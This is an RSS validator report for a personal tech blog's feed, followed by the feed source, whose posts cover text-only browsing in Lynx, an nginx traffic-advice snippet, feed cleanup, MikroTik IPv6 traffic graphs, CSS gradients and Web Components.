This service tests the validity of an RSS 2.0 feed, checking to see that it follows the rules of the RSS specification. For advice from the RSS Advisory Board on how to implement RSS and handle issues such as enclosures and HTML encoding, read the RSS Best Practices Profile. This checker is also a validator of Atom and RSS 1.0 feeds.

Use this tester regularly to ensure that your RSS feed continues to work well in the wide audience of RSS readers, podcast clients and other software that supports the format.

 

Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

  • line 3486, column 0: description should not contain script tag (6 occurrences) [help]

    <script src="https://gist.github.com/x-way/caf03da77fe2cc83b6bd.js"></script>
  • line 3494, column 0: content:encoded should not contain script tag (6 occurrences) [help]

    <script src="https://gist.github.com/x-way/caf03da77fe2cc83b6bd.js"></script>
  • line 5241, column 3: description should not contain relative URL references: # (16 occurrences) [help]

    ]]></description>
       ^
  • line 5243, column 3: content:encoded should not contain relative URL references: # (16 occurrences) [help]

    ]]></content:encoded>
       ^

Source: http://blog.x-way.org/rss.xml

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <rss version="2.0"
  3.  xmlns:dc="http://purl.org/dc/elements/1.1/"
  4.  xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
  5.  xmlns:content="http://purl.org/rss/1.0/modules/content/"
  6.  xmlns:atom="http://www.w3.org/2005/Atom">
  7.  
  8. <channel>
  9.  <title>x-log</title>
  10.  <link>https://blog.x-way.org</link>
  11.  <description>x-log</description>
  12.  <lastBuildDate>Sun, 30 Jun 2024 22:04:15 +0000</lastBuildDate>
  13.  <language>en</language>
  14.  <managingEditor>andreas+rss@jaggi.info (Andreas Jaggi)</managingEditor>
  15.  <webMaster>andreas+rss@jaggi.info (Andreas Jaggi)</webMaster>
  16.  <copyright>Andreas Jaggi</copyright>
  17.  <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  18.  <generator>x-log 66d3fa</generator>
  19.  <atom:link href="https://blog.x-way.org/rss.xml" rel="self" type="application/rss+xml"/>
  20.  
  21.  <image>
  22.    <url>https://blog.x-way.org/logo.gif</url>
  23.    <title>x-log</title>
  24.    <link>https://blog.x-way.org</link>
  25.  </image>
  26.  
  27.  
  28.  <item>
  29.    <title>Improved text-only UX</title>
  30.    <link>https://blog.x-way.org/Webdesign/2024/06/30/Improved-text-only-UX.html</link>
  31.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324371</guid>
  32.    <dc:creator>Andreas Jaggi</dc:creator>
  33.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  34.    <pubDate>Sun, 30 Jun 2024 21:37:00 +0000</pubDate>
  35.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  36.    <description><![CDATA[<p>Some time ago I read <a href="https://danq.me/2024/05/01/test-your-site-in-lynx/" title="Test your site in Lynx – Dan Q">this article from Dan Q</a> about testing your website in a text-only browser (<a href="https://en.wikipedia.org/wiki/Lynx_(web_browser)" title="Lynx (web browser) - Wikipedia">Lynx</a>, which is the oldest web browser still being maintained, started in 1992).</p>
  37. <p>Surfing through my blog with Lynx, I was positively surprised in how well the content and structure was presented.<br>Seems like the modernization and simplification efforts of the HTML code behind the scenes paid off well.</p>
  38. <p>The <a href="https://blog.x-way.org" title="x-log - Statistics">statistics page</a> though was not really usable, it was displayed as a random soup of numbers due to the usage of unstructured <code>&lt;div&gt;</code> tags for the elements of the visual graphs.</p>
  39. <p>To fix this I reverted back to using <code>&lt;table&gt;</code> tags to structure the data.<br>This way the layout degrades gracefully in text-only browsers and provides a minimally structured representation of the data.<br>And I applied <a href="https://blog.x-way.org/Webdesign/2024/06/18/More-modern-technologies.html" title="More modern technologies - x-log">the newly learned CSS skills</a> (<code>linear-gradient</code> backgrounds) to achieve the same visual graph as beforehand when opening the page in a regular browser.</p>
  40. <p><img src="https://blog.x-way.org/images/lynx-statistics.png" alt="Screenshot of Lynx rendering the statistics page" width="720" height="423"></p>
  41. ]]></description>
  42.    <content:encoded><![CDATA[<p>Some time ago I read <a href="https://danq.me/2024/05/01/test-your-site-in-lynx/" title="Test your site in Lynx – Dan Q">this article from Dan Q</a> about testing your website in a text-only browser (<a href="https://en.wikipedia.org/wiki/Lynx_(web_browser)" title="Lynx (web browser) - Wikipedia">Lynx</a>, which is the oldest web browser still being maintained, started in 1992).</p>
  43. <p>Surfing through my blog with Lynx, I was positively surprised in how well the content and structure was presented.<br>Seems like the modernization and simplification efforts of the HTML code behind the scenes paid off well.</p>
  44. <p>The <a href="https://blog.x-way.org" title="x-log - Statistics">statistics page</a> though was not really usable, it was displayed as a random soup of numbers due to the usage of unstructured <code>&lt;div&gt;</code> tags for the elements of the visual graphs.</p>
  45. <p>To fix this I reverted back to using <code>&lt;table&gt;</code> tags to structure the data.<br>This way the layout degrades gracefully in text-only browsers and provides a minimally structured representation of the data.<br>And I applied <a href="https://blog.x-way.org/Webdesign/2024/06/18/More-modern-technologies.html" title="More modern technologies - x-log">the newly learned CSS skills</a> (<code>linear-gradient</code> backgrounds) to achieve the same visual graph as beforehand when opening the page in a regular browser.</p>
  46. <p><img src="https://blog.x-way.org/images/lynx-statistics.png" alt="Screenshot of Lynx rendering the statistics page" width="720" height="423"></p>
  47. ]]></content:encoded>
  48.  </item>
  49.  
  50.  <item>
  51.    <title>.well-known/traffic-advice</title>
  52.    <link>https://blog.x-way.org/Webdesign/2024/06/29/well-known-traffic-advice.html</link>
  53.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324370</guid>
  54.    <dc:creator>Andreas Jaggi</dc:creator>
  55.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  56.    <pubDate>Sat, 29 Jun 2024 09:48:00 +0000</pubDate>
  57.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  58.    <description><![CDATA[<p>While looking at my 404s the top one for the blog was <code>/.well-known/traffic-advice</code>.<br>
  59. This is part of the traffic advice mechanism to control traffic from prefetch proxies (and based on my current access logs, seems only used by the <a href="https://developer.chrome.com/blog/private-prefetch-proxy/" title="Private prefetch proxy in Chrome">Chrome Privacy Preserving Prefetch Proxy</a>).</p>
  60. <p>The traffic advice mechanism is specified in the document <a href="https://buettner.github.io/private-prefetch-proxy/traffic-advice.html" title="Traffic Advice">here</a>.<br>
  61. It can be used to reduce the number of requests coming from prefetch proxies.</p>
  62. <p>To get rid of the 404s and provide support for the traffic advice mechanism, I use the following snippet in my nginx config.<br>
  63. It allows all requests from prefetch proxies (as currently I see no need to limit them).</p>
  64. <pre># Private Prefetch Proxy
  65. # https://developer.chrome.com/blog/private-prefetch-proxy/
  66. location /.well-known/traffic-advice {
  67.        types { } default_type "application/trafficadvice+json";
  68.        return 200 '[{"user_agent":"prefetch-proxy","fraction":1.0}]';
  69. }</pre>
  70. ]]></description>
  71.    <content:encoded><![CDATA[<p>While looking at my 404s the top one for the blog was <code>/.well-known/traffic-advice</code>.<br>
  72. This is part of the traffic advice mechanism to control traffic from prefetch proxies (and based on my current access logs, seems only used by the <a href="https://developer.chrome.com/blog/private-prefetch-proxy/" title="Private prefetch proxy in Chrome">Chrome Privacy Preserving Prefetch Proxy</a>).</p>
  73. <p>The traffic advice mechanism is specified in the document <a href="https://buettner.github.io/private-prefetch-proxy/traffic-advice.html" title="Traffic Advice">here</a>.<br>
  74. It can be used to reduce the number of requests coming from prefetch proxies.</p>
  75. <p>To get rid of the 404s and provide support for the traffic advice mechanism, I use the following snippet in my nginx config.<br>
  76. It allows all requests from prefetch proxies (as currently I see no need to limit them).</p>
  77. <pre># Private Prefetch Proxy
  78. # https://developer.chrome.com/blog/private-prefetch-proxy/
  79. location /.well-known/traffic-advice {
  80.        types { } default_type "application/trafficadvice+json";
  81.        return 200 '[{"user_agent":"prefetch-proxy","fraction":1.0}]';
  82. }</pre>
  83. ]]></content:encoded>
  84.  </item>
  85.  
  86.  <item>
  87.    <title>RSS feed tuning</title>
  88.    <link>https://blog.x-way.org/Webdesign/2024/06/23/RSS-feed-tuning.html</link>
  89.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324369</guid>
  90.    <dc:creator>Andreas Jaggi</dc:creator>
  91.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  92.    <pubDate>Sun, 23 Jun 2024 16:44:00 +0000</pubDate>
  93.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  94.    <description><![CDATA[<p>After the <a href="https://blog.x-way.org/Webdesign/2024/06/16/Jumping-on-the-Web-Components-bandwagon.html" title="Jumping on the Web Components bandwagon - x-log">recent addition of custom Web Components</a>, the usual <a href="https://www.rssboard.org/rss-validator/" title="RSS Validator">feed</a> <a href="https://validator.w3.org/feed/" title="W3C Feed Validation Service, for Atom and RSS">validators</a> were a bit less happy about my <a href="https://blog.x-way.org/rss.xml">RSS</a> and <a href="https://blog.x-way.org/atom.xml">Atom</a> feeds.</p>
  95. <p>They always marked my feeds as valid, but usually had some recommendations to improve interoperability with the widest range of feed readers.<br>In particular having non-HTML5 elements does not help with interoperability. Which makes sense as there is no real place in the XML of the feeds to reference the needed JavaScript for rendering the Web Components.</p>
  96. <p>Besides stripping away the &lt;youtube-vimeo-embed&gt; tags and replacing them with a link to the video, I took this opportunity to cleanup some other 'Altlasten' (legacy tech depts).<br>A lot of time was spent trying to get my head around various encodings/escapings of special characters. When the blog started in 2002, UTF-8 was not adopted yet and all special characters needed to be written as <a href="https://developer.mozilla.org/en-US/docs/Glossary/Character_reference" title="Character reference - MDN">HTML entities</a>.<br>And what didn't help is that I somehow had a text-only part in my RSS file which tried to deliver a version of my posts without any HTML (but failed to do so properly as it only had the tags stripped away but did not revert all the HTML character encodings.<br>Of course the various resulting &amp; characters nicely clash with XML encoding).</p>
  97. <p>There were some other oddities from the past, such as empty post titles and HTML tags inside titles.</p>
  98. <p>I ended up cleaning up most of this and got rid of the text-only representation and corresponding encoding/escaping problems. (using <code>&lt;![CDATA[</code> and <code>]]&gt;</code> with the HTML content inside makes life so much easier)</p>
  99. <p>The still remaing recommendations to improve are about relative links and <code>&lt;script&gt;</code> tags.<br>The relative links are all due to my replacing of dead and non-archived link destinations with a single <code>#</code>. So they are more a 'false postive' than a real problem, the links are dead either way.<br>The <code>&lt;script&gt;</code> tags are more problematic, as they result from my embedding of <a href="https://gist.github.com/" title="Discover Discover gists · GitHub">GitHub Gists</a> in posts. The code in the Gists is loaded, rendered and nicely highlighted with color by the script, thus not easy to replicate in a feed.</p>
  100. <p>Probably the best approach for the Gists would be to find a way to properly include the content into the posts. So that it is rendered nicely when viewed in a browser, and has a meaningful text-only fallback in the feeds.<br>Would make sense to self-hosts these anyways. Next rainy weekend project there you are :-)</p>
  101. <p><a href="https://www.rssboard.org/rss-validator/check.cgi?url=http%3A%2F%2Fblog.x-way.org%2Frss.xml" title="RSS Validator Results: http://blog.x-way.org/rss.xml"><img src="https://blog.x-way.org/images/valid-rss-rogers.png" width="88" height="31" alt="This is a valid RSS feed."></a> <a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Fatom.xml" title="Feed Validator Results: https://blog.x-way.org/atom.xml"><img src="https://blog.x-way.org/images/valid-atom.png" width="88" height="31" alt="This is a valid Atom 1.0 feed."></a></p>
  102. ]]></description>
  103.    <content:encoded><![CDATA[<p>After the <a href="https://blog.x-way.org/Webdesign/2024/06/16/Jumping-on-the-Web-Components-bandwagon.html" title="Jumping on the Web Components bandwagon - x-log">recent addition of custom Web Components</a>, the usual <a href="https://www.rssboard.org/rss-validator/" title="RSS Validator">feed</a> <a href="https://validator.w3.org/feed/" title="W3C Feed Validation Service, for Atom and RSS">validators</a> were a bit less happy about my <a href="https://blog.x-way.org/rss.xml">RSS</a> and <a href="https://blog.x-way.org/atom.xml">Atom</a> feeds.</p>
  104. <p>They always marked my feeds as valid, but usually had some recommendations to improve interoperability with the widest range of feed readers.<br>In particular having non-HTML5 elements does not help with interoperability. Which makes sense as there is no real place in the XML of the feeds to reference the needed JavaScript for rendering the Web Components.</p>
  105. <p>Besides stripping away the &lt;youtube-vimeo-embed&gt; tags and replacing them with a link to the video, I took this opportunity to cleanup some other 'Altlasten' (legacy tech depts).<br>A lot of time was spent trying to get my head around various encodings/escapings of special characters. When the blog started in 2002, UTF-8 was not adopted yet and all special characters needed to be written as <a href="https://developer.mozilla.org/en-US/docs/Glossary/Character_reference" title="Character reference - MDN">HTML entities</a>.<br>And what didn't help is that I somehow had a text-only part in my RSS file which tried to deliver a version of my posts without any HTML (but failed to do so properly as it only had the tags stripped away but did not revert all the HTML character encodings.<br>Of course the various resulting &amp; characters nicely clash with XML encoding).</p>
  106. <p>There were some other oddities from the past, such as empty post titles and HTML tags inside titles.</p>
  107. <p>I ended up cleaning up most of this and got rid of the text-only representation and corresponding encoding/escaping problems. (using <code>&lt;![CDATA[</code> and <code>]]&gt;</code> with the HTML content inside makes life so much easier)</p>
  108. <p>The still remaing recommendations to improve are about relative links and <code>&lt;script&gt;</code> tags.<br>The relative links are all due to my replacing of dead and non-archived link destinations with a single <code>#</code>. So they are more a 'false postive' than a real problem, the links are dead either way.<br>The <code>&lt;script&gt;</code> tags are more problematic, as they result from my embedding of <a href="https://gist.github.com/" title="Discover Discover gists · GitHub">GitHub Gists</a> in posts. The code in the Gists is loaded, rendered and nicely highlighted with color by the script, thus not easy to replicate in a feed.</p>
  109. <p>Probably the best approach for the Gists would be to find a way to properly include the content into the posts. So that it is rendered nicely when viewed in a browser, and has a meaningful text-only fallback in the feeds.<br>Would make sense to self-hosts these anyways. Next rainy weekend project there you are :-)</p>
  110. <p><a href="https://www.rssboard.org/rss-validator/check.cgi?url=http%3A%2F%2Fblog.x-way.org%2Frss.xml" title="RSS Validator Results: http://blog.x-way.org/rss.xml"><img src="https://blog.x-way.org/images/valid-rss-rogers.png" width="88" height="31" alt="This is a valid RSS feed."></a> <a href="https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fblog.x-way.org%2Fatom.xml" title="Feed Validator Results: https://blog.x-way.org/atom.xml"><img src="https://blog.x-way.org/images/valid-atom.png" width="88" height="31" alt="This is a valid Atom 1.0 feed."></a></p>
  111. ]]></content:encoded>
  112.  </item>
  113.  
  114.  <item>
  115.    <title>sibatable</title>
  116.    <link>https://blog.x-way.org/Food/2024/06/22/sibatable.html</link>
  117.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324368</guid>
  118.    <dc:creator>Andreas Jaggi</dc:creator>
  119.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  120.    <pubDate>Sat, 22 Jun 2024 20:06:00 +0000</pubDate>
  121.    <category domain="https://blog.x-way.org/Food">Food</category>
  122.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/sibatable.jpg" title="sibatable"><img src="https://blog.x-way.org/images/sibatable_thumb.jpg" width="446" height="431" alt="A bowl of ramen with the rice and eggs decorated so that they look like a chicken with her chicks."></a></p>
  123. <p>Amazing food art by <a href="https://www.instagram.com/sibatable/" title="시바테이블 (&#064;sibatable) • Instagram">sibatable</a>.</p>
  124. <p>Besides the <a href="https://www.instagram.com/sibatable/" title="시바테이블 (&#064;sibatable) • Instagram">Instagram page</a> and the <a href="https://ohou.se/users/8132629" title="sibatable님의 공간에 오신 것을 환영합니다.">ohou.se page</a> check out the articles from <a href="https://www.tapasmagazine.es/en/sibatable-the-aesthetisation-food-through-fantasy/" title="Sibatable, the aestheticisation of food through fantasy - Tapas">Tapas</a> and <a href="https://mymodernmet.com/min-kyung-kin-sibatable-animal-food-art/" title="Super Cute Animal Food Art by Korean Artist">My Modern Met</a> for more infos about the artist.</p>
  125. <p>(<a href="https://labnotes.org/weekend-reading-occams-shaving-kit/" title="Weekend Reading — Occam&#x27;s shaving kit —  Labnotes (by Assaf Arkin)">via</a>)</p>
  126. ]]></description>
  127.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/sibatable.jpg" title="sibatable"><img src="https://blog.x-way.org/images/sibatable_thumb.jpg" width="446" height="431" alt="A bowl of ramen with the rice and eggs decorated so that they look like a chicken with her chicks."></a></p>
  128. <p>Amazing food art by <a href="https://www.instagram.com/sibatable/" title="시바테이블 (&#064;sibatable) • Instagram">sibatable</a>.</p>
  129. <p>Besides the <a href="https://www.instagram.com/sibatable/" title="시바테이블 (&#064;sibatable) • Instagram">Instagram page</a> and the <a href="https://ohou.se/users/8132629" title="sibatable님의 공간에 오신 것을 환영합니다.">ohou.se page</a> check out the articles from <a href="https://www.tapasmagazine.es/en/sibatable-the-aesthetisation-food-through-fantasy/" title="Sibatable, the aestheticisation of food through fantasy - Tapas">Tapas</a> and <a href="https://mymodernmet.com/min-kyung-kin-sibatable-animal-food-art/" title="Super Cute Animal Food Art by Korean Artist">My Modern Met</a> for more infos about the artist.</p>
  130. <p>(<a href="https://labnotes.org/weekend-reading-occams-shaving-kit/" title="Weekend Reading — Occam&#x27;s shaving kit —  Labnotes (by Assaf Arkin)">via</a>)</p>
  131. ]]></content:encoded>
  132.  </item>
  133.  
  134.  <item>
  135.    <title>IPv6 vs IPv4 traffic graphs in MikroTik</title>
  136.    <link>https://blog.x-way.org/Networking/2024/06/22/IPv6-vs-IPv4-traffic-graphs-in-MikroTik.html</link>
  137.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324367</guid>
  138.    <dc:creator>Andreas Jaggi</dc:creator>
  139.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  140.    <pubDate>Sat, 22 Jun 2024 12:32:00 +0000</pubDate>
  141.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  142.    <description><![CDATA[<p>Out of curiosity I wanted to know how much of my Internet traffic uses IPv6 vs the <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">legacy IPv4</a>.</p>
  143. <p>There is no out-of-the-box graph for this in MikroTik.<br>Several forum and Stack Overflow posts suggest using ratelimiting queues with their graphing feature to collect this data.<p>
  144. <p>After experimenting a bit, I ended up with the following configuration which creates two queues to collect the traffic data.<br>Important to know, traffic flows on a first-match basis through the queues. Thus the trick of having first the queue matching IPv6 traffic and then the queue matching all the remaining traffic.<br>Also, I use <code>10G</code> as 'unreachable' traffic limit to avoid any traffic being ratelimited. This works well for my 1Gbit/s setup, but will need to be adjusted if you have a higher bandwidth.</p>
  145. <pre>/queue simple add limit-at=10G/10G max-limit=10G/10G name=v6-traffic queue=ethernet-default/ethernet-default target=2000::/3 total-queue=ethernet-default
  146. /queue simple add limit-at=10G/10G max-limit=10G/10G name=v4-traffic queue=ethernet-default/ethernet-default target="" total-queue=ethernet-default</pre>
  147. <p>Having the queues in place for a couple days results in the following graphs:</p>
  148. <p>IPv6 Traffic<br>
  149. <img src="https://blog.x-way.org/images/ipv6-traffic.png" width="492" height="251" alt="Weekly traffic graph of the IPv6 queue, showing an average of 379.65Kb incoming traffic."></p>
  150. <p>IPv4 Traffic<br>
  151. <img src="https://blog.x-way.org/images/ipv4-traffic.png" width="492" height="251" alt="Weekly traffic graph of the IPv4 queue, showing an average of 21.49Kb incoming traffic."></p>
  152. <p>Happy to see that a large majority of my traffic uses IPv6 :-)</p>
  153. ]]></description>
  154.    <content:encoded><![CDATA[<p>Out of curiosity I wanted to know how much of my Internet traffic uses IPv6 vs the <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">legacy IPv4</a>.</p>
  155. <p>There is no out-of-the-box graph for this in MikroTik.<br>Several forum and Stack Overflow posts suggest using ratelimiting queues with their graphing feature to collect this data.<p>
  156. <p>After experimenting a bit, I ended up with the following configuration which creates two queues to collect the traffic data.<br>Important to know, traffic flows on a first-match basis through the queues. Thus the trick of having first the queue matching IPv6 traffic and then the queue matching all the remaining traffic.<br>Also, I use <code>10G</code> as 'unreachable' traffic limit to avoid any traffic being ratelimited. This works well for my 1Gbit/s setup, but will need to be adjusted if you have a higher bandwidth.</p>
  157. <pre>/queue simple add limit-at=10G/10G max-limit=10G/10G name=v6-traffic queue=ethernet-default/ethernet-default target=2000::/3 total-queue=ethernet-default
  158. /queue simple add limit-at=10G/10G max-limit=10G/10G name=v4-traffic queue=ethernet-default/ethernet-default target="" total-queue=ethernet-default</pre>
  159. <p>Having the queues in place for a couple days results in the following graphs:</p>
  160. <p>IPv6 Traffic<br>
  161. <img src="https://blog.x-way.org/images/ipv6-traffic.png" width="492" height="251" alt="Weekly traffic graph of the IPv6 queue, showing an average of 379.65Kb incoming traffic."></p>
  162. <p>IPv4 Traffic<br>
  163. <img src="https://blog.x-way.org/images/ipv4-traffic.png" width="492" height="251" alt="Weekly traffic graph of the IPv4 queue, showing an average of 21.49Kb incoming traffic."></p>
  164. <p>Happy to see that a large majority of my traffic uses IPv6 :-)</p>
  165. ]]></content:encoded>
  166.  </item>
  167.  
  168.  <item>
  169.    <title>More modern technologies</title>
  170.    <link>https://blog.x-way.org/Webdesign/2024/06/18/More-modern-technologies.html</link>
  171.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324366</guid>
  172.    <dc:creator>Andreas Jaggi</dc:creator>
  173.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  174.    <pubDate>Tue, 18 Jun 2024 20:59:00 +0000</pubDate>
  175.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  176.    <description><![CDATA[<p>After the recent <a href="https://blog.x-way.org/Webdesign/2024/06/16/Jumping-on-the-Web-Components-bandwagon.html" title="Jumping on the Web Components bandwagon - x-log">integration of Web Components in the blog</a>, I made yet another stab at using some modern technologies.</p>
  177. <p>This time inspired by the <a href="https://lynnandtonic.com/thoughts/entries/ten-years-of-a-single-div/" title="Ten years of A Single Div | Lynn Fisher">Ten years of A Single Div</a> article, my focus was on the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/gradient/linear-gradient" title="linear-gradient() - CSS | MDN">linear-gradient()</a> and <a  href="https://developer.mozilla.org/en-US/docs/Web/CSS/gradient/radial-gradient" title="radial-gradient() - CSS | MDN">radial-gradient()</a> CSS properties.</p>
  178. <p>They can be combined to draw almost arbitrary shapes with pure CSS.</p>
  179. <p>I used this to replace all graphics on <a href="https://www.andreas-jaggi.ch/" title="andreas-jaggi.ch">andreas-jaggi.ch</a> with CSS, while keeping the layout and functionality identical to the <a href="https://web.archive.org/web/20050311173245/http://x-way.waterwave.ch/#" title="x-way.waterwave.ch (archive.org)">original 2005 version</a>.</p>
  180. <p>In the process of this, also some additional modern CSS features were used:<br>
  181. <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/var" title="var() - CSS | MDN">var()</a> to simplify repeating CSS code.<br>
  182. <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/animation" title="animation - CSS | MDN">animation</a>/<a href="https://developer.mozilla.org/en-US/docs/Web/CSS/@keyframes" title="@keyframes - CSS | MDN">@keyframes</a> to add a little fade-in effect on the hover text.</p>
  183. ]]></description>
  184.    <content:encoded><![CDATA[<p>After the recent <a href="https://blog.x-way.org/Webdesign/2024/06/16/Jumping-on-the-Web-Components-bandwagon.html" title="Jumping on the Web Components bandwagon - x-log">integration of Web Components in the blog</a>, I made yet another stab at using some modern technologies.</p>
  185. <p>This time inspired by the <a href="https://lynnandtonic.com/thoughts/entries/ten-years-of-a-single-div/" title="Ten years of A Single Div | Lynn Fisher">Ten years of A Single Div</a> article, my focus was on the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/gradient/linear-gradient" title="linear-gradient() - CSS | MDN">linear-gradient()</a> and <a  href="https://developer.mozilla.org/en-US/docs/Web/CSS/gradient/radial-gradient" title="radial-gradient() - CSS | MDN">radial-gradient()</a> CSS properties.</p>
  186. <p>They can be combined to draw almost arbitrary shapes with pure CSS.</p>
  187. <p>I used this to replace all graphics on <a href="https://www.andreas-jaggi.ch/" title="andreas-jaggi.ch">andreas-jaggi.ch</a> with CSS, while keeping the layout and functionality identical to the <a href="https://web.archive.org/web/20050311173245/http://x-way.waterwave.ch/#" title="x-way.waterwave.ch (archive.org)">original 2005 version</a>.</p>
  188. <p>In the process of this, also some additional modern CSS features were used:<br>
  189. <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/var" title="var() - CSS | MDN">var()</a> to simplify repeating CSS code.<br>
  190. <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/animation" title="animation - CSS | MDN">animation</a>/<a href="https://developer.mozilla.org/en-US/docs/Web/CSS/@keyframes" title="@keyframes - CSS | MDN">@keyframes</a> to add a little fade-in effect on the hover text.</p>
  191. ]]></content:encoded>
  192.  </item>
  193.  
  194.  <item>
  195.    <title>Jumping on the Web Components bandwagon</title>
  196.    <link>https://blog.x-way.org/Webdesign/2024/06/16/Jumping-on-the-Web-Components-bandwagon.html</link>
  197.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324365</guid>
  198.    <dc:creator>Andreas Jaggi</dc:creator>
  199.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  200.    <pubDate>Sun, 16 Jun 2024 21:53:00 +0000</pubDate>
  201.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  202.    <description><![CDATA[<p>The <a href="https://adrianroselli.com/2024/06/youtube-and-vimeo-web-component.html" title="YouTube and Vimeo Web Component - Adrian Roselli">recent article from Adrian Roselli</a> explaining how to write a Web Component for YouTube and Vimeo videos, triggered me to finally adopt the Web Components technology for my blog.<br>Additionally there is <a href="https://kniebes.com/" title="Markus Kniebes">Markus</a> using <a href="https://kniebes.com/2023/07/01/sharing-web-component" title="Sharing Web Component (kniebes.com)">Web Components for his blog</a> since quite some time, which gave me confidence.</p>
  203. <p>Implementing Web Components was now not only for the sake of learning about the technology, but also to address some longstanding painpoints I had with my embedded videos.<br>In particular did I not like that each embedded video triggered the loading of a plethora of third-party scripts and styles only to render the thumbnail image. And additionally this leaked tracking/cookie information to the video hosters (yes, I was using www.youtube-nocookie.com to reduce this as far as possible, but could not eliminate it completely).</p>
  204. <p>Thus I added a <code>&lt;youtube-vimeo-embed&gt;</code> Web Component and changed all my embedded YouTube and Vimeo videos to use it.</p>
  205. <p>My implementation is almost a 1:1 copy of the <a href="https://github.com/aardrian/youtube-vimeo-embed/tree/main" title="GitHub - aardrian/youtube-vimeo-embed: A custom element to embed either a YouTube or Vimeo video into your page.">code provided by Adrian</a>, with some minor adaptions (such as hiding the original link when the video iframe can be rendered and always enabling fullscreen mode in videos).</p>
  206. <p>I'm quite happy with the outcome, as it provides some new benefits:<br>
  207. Except for the thumbnail image, no other third-party resources are loaded until someone clicks on the play button.<br>
  208. When JavaScript or Web Components are not supported by a browser, it gracefuly falls back to a simple link to the video.<br>
  209. Loading speed of the whole page improved quite a bit, as videos are only loaded on demand.<br>
  210. It always uses www.youtube-nocookie.com and third-party scripts are only loaded if someone explicitly clicks on the play button of a video :-)</p>
  211. ]]></description>
  212.    <content:encoded><![CDATA[<p>The <a href="https://adrianroselli.com/2024/06/youtube-and-vimeo-web-component.html" title="YouTube and Vimeo Web Component - Adrian Roselli">recent article from Adrian Roselli</a> explaining how to write a Web Component for YouTube and Vimeo videos, triggered me to finally adopt the Web Components technology for my blog.<br>Additionally there is <a href="https://kniebes.com/" title="Markus Kniebes">Markus</a> using <a href="https://kniebes.com/2023/07/01/sharing-web-component" title="Sharing Web Component (kniebes.com)">Web Components for his blog</a> since quite some time, which gave me confidence.</p>
  213. <p>Implementing Web Components was now not only for the sake of learning about the technology, but also to address some longstanding painpoints I had with my embedded videos.<br>In particular did I not like that each embedded video triggered the loading of a plethora of third-party scripts and styles only to render the thumbnail image. And additionally this leaked tracking/cookie information to the video hosters (yes, I was using www.youtube-nocookie.com to reduce this as far as possible, but could not eliminate it completely).</p>
  214. <p>Thus I added a <code>&lt;youtube-vimeo-embed&gt;</code> Web Component and changed all my embedded YouTube and Vimeo videos to use it.</p>
  215. <p>My implementation is almost a 1:1 copy of the <a href="https://github.com/aardrian/youtube-vimeo-embed/tree/main" title="GitHub - aardrian/youtube-vimeo-embed: A custom element to embed either a YouTube or Vimeo video into your page.">code provided by Adrian</a>, with some minor adaptions (such as hiding the original link when the video iframe can be rendered and always enabling fullscreen mode in videos).</p>
  216. <p>I'm quite happy with the outcome, as it provides some new benefits:<br>
  217. Except for the thumbnail image, no other third-party resources are loaded until someone clicks on the play button.<br>
  218. When JavaScript or Web Components are not supported by a browser, it gracefuly falls back to a simple link to the video.<br>
  219. Loading speed of the whole page improved quite a bit, as videos are only loaded on demand.<br>
  220. It always uses www.youtube-nocookie.com and third-party scripts are only loaded if someone explicitly clicks on the play button of a video :-)</p>
  221. ]]></content:encoded>
  222.  </item>
  223.  
  224.  <item>
  225.    <title>blo.gs still Pinging</title>
  226.    <link>https://blog.x-way.org/Coding/2024/06/12/blogs-still-Pinging.html</link>
  227.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324364</guid>
  228.    <dc:creator>Andreas Jaggi</dc:creator>
  229.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  230.    <pubDate>Wed, 12 Jun 2024 06:28:00 +0000</pubDate>
  231.    <category domain="https://blog.x-way.org/Coding">Coding</category>
